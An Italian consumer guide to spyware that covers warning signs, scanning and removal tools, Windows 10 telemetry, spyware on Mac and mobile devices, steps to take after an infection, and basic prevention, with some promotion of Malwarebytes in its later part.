Ora passiamo alla pratica. Come controllare la presenza di spyware nel tuo computer se all'improvviso, per qualche motivo, si insinuano dubbi sull'integrità del sistema di sicurezza? Per fare ciò, è necessario sapere come si manifesta l'impatto di tali applicazioni nelle fasi iniziali.

Se senza una ragione apparente si nota una diminuzione delle prestazioni, o il sistema periodicamente "si blocca" o si rifiuta di funzionare del tutto, è necessario prima esaminare il carico sul processore e sulla RAM e monitorare anche tutti i processi attivi.

Nella maggior parte dei casi, l'utente nello stesso "Task Manager" vedrà servizi sconosciuti che non erano precedentemente presenti nell'albero dei processi. Questa è solo la prima chiamata. I creatori di spyware sono tutt'altro che stupidi, quindi creano programmi che si mascherano da processi di sistema ed è semplicemente impossibile identificarli manualmente senza conoscenze speciali. Quindi iniziano i problemi con la connessione a Internet, la modifica della pagina iniziale, ecc.

Come controllare la presenza di spyware sul tuo computer

Per quanto riguarda la scansione, gli antivirus standard non aiuteranno qui, soprattutto se hanno già mancato la minaccia. Come minimo, avrai bisogno di una sorta di versione portatile come Kaspersky Virus Removal Tool (o meglio ancora, qualcosa come Rescue Disc che controlla il sistema prima dell'avvio).

Come trovare spyware sul tuo computer? Nella maggior parte dei casi, si consiglia di utilizzare programmi speciali altamente mirati della classe Anti-Spyware (SpywareBlaster, AVZ, XoftSpySE Anti-Spyware, Microsoft Antispyware, ecc.). Il processo di scansione al loro interno è completamente automatizzato, così come la successiva eliminazione. Ma qui ci sono cose a cui vale la pena prestare attenzione.

Come rimuovere lo spyware dal computer: metodi standard e software di terze parti utilizzati

Puoi anche rimuovere manualmente lo spyware dal tuo computer, ma solo se il programma non è mascherato.

Per fare ciò, puoi andare nella sezione programmi e funzionalità, trovare nell'elenco l'applicazione che stai cercando e avviare il processo di disinstallazione. È vero, il programma di disinstallazione di Windows, per usare un eufemismo, non è molto buono, poiché lascia un sacco di spazzatura sul computer una volta completato il processo, quindi è meglio utilizzare utilità specializzate come iObit Uninstaller, che, oltre a disinstallare in modo standard, consentono di eseguire scansioni approfondite per cercare file residui o anche chiavi e voci nel registro di sistema.

Ora qualche parola sulla sensazionale utility Spyhunter. Molti lo definiscono quasi una panacea per tutti i mali. Ci permettiamo di dissentire. Esegue ancora la scansione del sistema, ma a volte restituisce un falso positivo, ma non è questo il problema. Il fatto è che disinstallarlo risulta essere piuttosto problematico. Per l’utente medio, solo il numero di azioni da eseguire fa girare la testa.

Cosa usare? La protezione contro tali minacce e la ricerca di spyware sul computer può essere effettuata, ad esempio, anche utilizzando ESETNOD32 o il pacchetto Smart Security con la funzione Antifurto attivata. Tuttavia, ognuno sceglie da solo ciò che è meglio e più facile per lui.

Spionaggio legalizzato in Windows 10

Ma non è tutto. Tutto quanto sopra riguardava solo il modo in cui lo spyware penetra nel sistema, come si comporta, ecc. Ma cosa fare quando lo spionaggio è legale?

Windows 10 non ha funzionato bene in questo senso. Ci sono una serie di servizi che devono essere disabilitati (comunicazione di dati con server Microsoft remoti, utilizzo dell'identità per ricevere annunci, invio di dati a un'azienda, determinazione della posizione tramite telemetria, ricezione di aggiornamenti da più posizioni, ecc.).

Esiste una protezione al 100%?

Se si osserva attentamente come lo spyware entra in un computer e cosa fa in seguito, c'è solo una cosa che possiamo dire sulla protezione al 100%: non esiste. Anche se utilizzi l'intero arsenale di strumenti di sicurezza, puoi essere sicuro all'80%, non di più. Tuttavia, non dovrebbero esserci azioni provocatorie da parte dell'utente stesso sotto forma di visita di siti dubbi, installazione di software non sicuro, ignoranza degli avvisi antivirus, apertura di allegati e-mail da fonti sconosciute, ecc.

Quando usi Internet, non dovresti dare per scontato che la tua privacy sia protetta. I malvagi spesso monitorano le tue azioni e cercano di ottenere le tue informazioni personali utilizzando malware speciali: spyware. Questo è uno dei tipi di minacce più antichi e comuni su Internet: questi programmi entrano nel tuo computer senza autorizzazione per avviare varie attività illegali. È molto facile cadere vittima di tali programmi, ma può essere difficile liberarsene, soprattutto quando non sai nemmeno che il tuo computer è infetto. Ma non disperare! Non vi lasceremo soli con le minacce! Hai solo bisogno di sapere cos'è lo spyware, come arriva sul tuo computer, come tenta di farti del male, come eliminare questi programmi e come puoi prevenire attacchi di spyware in futuro.

Cos'è lo spyware?

Storia dello spyware

Il termine “spyware” è stato menzionato per la prima volta nel 1996 in uno degli articoli specializzati. Nel 1999 questo termine veniva utilizzato nei comunicati stampa e aveva già il significato che gli viene assegnato oggi. Ha rapidamente guadagnato popolarità nei media. Passò un po' di tempo e nel giugno del 2000 venne rilasciata la prima applicazione progettata per combattere lo spyware.

"La prima menzione di spyware risale al 1996."

Nell'ottobre 2004 la società di media America Online e la National Cyber ​​​​Security Alliance (NCSA) hanno condotto uno studio su questo fenomeno. Il risultato è stato incredibile e spaventoso. Circa l'80% di tutti gli utenti Internet si è imbattuto prima o poi in spyware infiltrati nei propri computer; circa il 93% dei computer aveva componenti spyware, mentre l'89% degli utenti non ne era a conoscenza. E quasi tutti gli utenti vittime di spyware (circa il 95%) hanno ammesso di non aver dato il permesso per installarlo.

Oggi il sistema operativo Windows è il bersaglio preferito degli attacchi spyware a causa del suo utilizzo diffuso. Tuttavia, negli ultimi anni, gli sviluppatori di spyware hanno prestato attenzione anche alla piattaforma Apple e ai dispositivi mobili.

Spyware per Mac

Storicamente, gli autori di spyware hanno scelto come obiettivo principale la piattaforma Windows perché ha una base di utenti più ampia rispetto alla piattaforma Mac. Nonostante ciò, nel 2017 il settore ha registrato un aumento significativo dell’attività malware per Mac, con la maggior parte degli attacchi sferrati tramite spyware. Lo spyware per Mac ha un modello di comportamento simile allo spyware per Windows, ma è dominato da password stealer e backdoor generici. Le attività dannose del software appartenente alla seconda categoria includono l'esecuzione remota di codice dannoso, keylogging, cattura di schermate, caricamento e download arbitrario di file, phishing di password, ecc.

“Nel 2017 il settore ha registrato un aumento significativo dell’attività malware per Mac, con la maggior parte degli attacchi sferrati tramite spyware”.

Oltre agli spyware dannosi, sui Mac sono comuni anche i cosiddetti spyware “legittimi”. Questi programmi vengono venduti da aziende reali su siti Web ufficiali e il loro scopo principale è controllare bambini o dipendenti. Naturalmente, tali programmi sono una classica "arma a doppio taglio": consentono la possibilità di abuso delle loro funzioni, poiché forniscono all'utente medio l'accesso a strumenti spyware senza richiedere conoscenze particolari.

Spyware per dispositivi mobili

Lo spyware non crea scorciatoie e può risiedere a lungo nella memoria del dispositivo mobile, rubando informazioni importanti come messaggi SMS in entrata/uscita, registri delle chiamate in entrata/uscita, elenchi di contatti, messaggi e-mail, cronologia del browser e foto. Inoltre, lo spyware per dispositivi mobili può potenzialmente tenere traccia dei tasti premuti, registrare suoni nel raggio d'azione del microfono del dispositivo, scattare foto in background e monitorare la posizione del dispositivo tramite GPS. In alcuni casi gli spyware riescono addirittura a controllare il dispositivo utilizzando comandi inviati via SMS e/o provenienti da server remoti. Lo spyware invia informazioni rubate tramite e-mail o tramite scambio di dati con un server remoto.

Non dimenticare che i consumatori non sono l'unico bersaglio dei criminali informatici che creano spyware. Se utilizzi il tuo smartphone o tablet al lavoro, gli hacker possono attaccare l'organizzazione del tuo datore di lavoro attraverso le vulnerabilità nel sistema del dispositivo mobile. Inoltre, i team di risposta agli incidenti di sicurezza informatica potrebbero non essere in grado di rilevare gli attacchi effettuati tramite dispositivi mobili.

Lo spyware in genere si infiltra negli smartphone in tre modi:

  • Una rete Wi-Fi gratuita non protetta che viene spesso installata in luoghi pubblici, come aeroporti e bar. Se sei registrato su una rete di questo tipo e trasmetti dati tramite una connessione non protetta, gli aggressori possono monitorare tutte le azioni che esegui mentre rimani sulla rete. Presta attenzione ai messaggi di avviso che appaiono sullo schermo del tuo dispositivo, soprattutto se indicano un'impossibilità di verificare l'identità del server. Prenditi cura della tua sicurezza: evita tali connessioni non protette.
  • Le vulnerabilità del sistema operativo possono creare i presupposti affinché oggetti dannosi possano penetrare in un dispositivo mobile. I produttori di smartphone rilasciano spesso aggiornamenti del sistema operativo per proteggere gli utenti. Pertanto, ti consigliamo di installare gli aggiornamenti non appena diventano disponibili (prima che gli hacker tentino di attaccare i dispositivi su cui è installato software obsoleto).
  • Oggetti dannosi sono spesso nascosti in programmi apparentemente comuni e la probabilità che ciò accada aumenta se li scarichi da siti Web o messaggi anziché tramite l'app store. È importante prestare attenzione ai messaggi di avviso durante l'installazione delle app, soprattutto se richiedono l'autorizzazione per accedere alla tua posta elettronica o ad altre informazioni personali. Pertanto, possiamo formulare la principale regola di sicurezza: utilizzare solo risorse affidabili per i dispositivi mobili ed evitare applicazioni di terze parti.

Chi viene preso di mira dallo spyware?

A differenza di altri tipi di malware, gli sviluppatori di spyware non mirano a prendere di mira un gruppo specifico di persone con i loro prodotti. Al contrario, nella maggior parte degli attacchi, lo spyware diffonde le sue reti in modo molto ampio per prendere di mira il maggior numero possibile di dispositivi. Di conseguenza ogni utente è potenzialmente un bersaglio per lo spyware perché, come giustamente credono gli aggressori, anche la più piccola quantità di dati prima o poi troverà il suo acquirente.

"Nella maggior parte degli attacchi, lo spyware distribuisce le sue reti in modo molto ampio per prendere di mira il maggior numero possibile di dispositivi."

Ad esempio, gli spammer acquistano indirizzi e-mail e password per inviare spam dannoso o impersonare qualcun altro. A seguito degli attacchi spyware alle informazioni finanziarie, qualcuno può perdere fondi in un conto bancario o diventare vittima di truffatori che utilizzano conti bancari reali nelle loro truffe.

Le informazioni ottenute da documenti, immagini, video rubati e altre forme digitali di archiviazione dei dati possono essere utilizzate a scopo di estorsione.

In definitiva, nessuno è immune dagli attacchi spyware e gli hacker non pensano molto a quali computer infettare per raggiungere i propri obiettivi.

Cosa devo fare se il mio computer è infetto?

Una volta all'interno di un sistema, lo spyware tende a non essere rilevato e può essere rilevato solo se l'utente ha sufficiente esperienza e sa effettivamente dove cercare. Tanti utenti continuano a lavorare, ignari della minaccia. Ma se pensi che lo spyware sia penetrato nel tuo computer, devi prima ripulire il sistema dagli oggetti dannosi per non compromettere le nuove password. Installa un antivirus affidabile in grado di fornire un'adeguata sicurezza informatica e che utilizzi algoritmi aggressivi per rilevare e rimuovere spyware. Questo è importante perché solo le azioni antivirus aggressive possono rimuovere completamente gli artefatti spyware dal sistema, nonché ripristinare file danneggiati e impostazioni interrotte.

Una volta che il tuo sistema è stato ripulito dalle minacce, contatta la tua banca per avvisarla di potenziali attività dannose. A seconda delle informazioni compromesse sul computer infetto (soprattutto se è connesso a una rete aziendale o organizzativa), potrebbe essere richiesto per legge di segnalare il virus alle forze dell'ordine o di rilasciare una dichiarazione pubblica. Se le informazioni sono di natura sensibile o implicano la raccolta e la trasmissione di immagini, audio e/o video, è necessario contattare un funzionario delle forze dell'ordine per segnalare potenziali violazioni delle leggi federali o locali.

Un'ultima cosa: molti fornitori di protezione dal furto di identità affermano che i loro servizi possono rilevare transazioni fraudolente o congelare temporaneamente il tuo conto di credito per prevenire danni causati da malware dannoso. A prima vista, bloccare una carta di credito è un’idea davvero valida. Tuttavia, Malwarebytes sconsiglia vivamente l'acquisto di prodotti per la protezione dal furto di identità.

"Molti fornitori di protezione contro il furto di identità affermano che i loro servizi sono in grado di rilevare transazioni fraudolente."

Come proteggersi dagli spyware?

La migliore protezione contro lo spyware, come con la maggior parte dei tipi di malware, dipende principalmente da ciò che fai. Segui queste linee guida di base per garantire la tua sicurezza informatica:

  • Non aprire e-mail provenienti da mittenti sconosciuti.
  • Non scaricare file da fonti non verificate.
  • Prima di fare clic su un collegamento, posiziona il mouse su di esso per vedere a quale pagina web ti porterà.

Ma man mano che gli utenti sono diventati più sofisticati in termini di sicurezza informatica, anche gli hacker sono diventati più sofisticati, creando modi sempre più sofisticati per diffondere spyware. Questo è il motivo per cui l'installazione di un antivirus comprovato è estremamente importante per combattere gli spyware più recenti.

Cerca antivirus che forniscano protezione in tempo reale. Questa funzionalità consente di bloccare automaticamente spyware e altre minacce prima che possano danneggiare il computer. Alcuni antivirus tradizionali e altri strumenti di sicurezza informatica fanno molto affidamento su algoritmi di rilevamento basati su firme, facili da aggirare, soprattutto quando si tratta di minacce moderne.
Dovresti anche prestare attenzione alla presenza di funzioni che bloccano la penetrazione dello spyware nel tuo computer. Ciò potrebbe includere, ad esempio, la tecnologia anti-exploit e la protezione contro i siti Web dannosi che ospitano spyware. La versione premium di Malwarebytes ha una comprovata esperienza nel fornire una protezione anti-spyware affidabile.

Nel mondo digitale i pericoli sono parte integrante della realtà online e possono aspettarti ad ogni angolo. Fortunatamente, esistono modi semplici ed efficaci per proteggersi da essi. Se mantieni un sano equilibrio tra l'utilizzo di un antivirus e l'adozione di precauzioni di base, sarai in grado di proteggere ogni computer che utilizzi dagli attacchi spyware e dalle azioni dei criminali dietro di essi.
Puoi leggere tutti i nostri report sugli spyware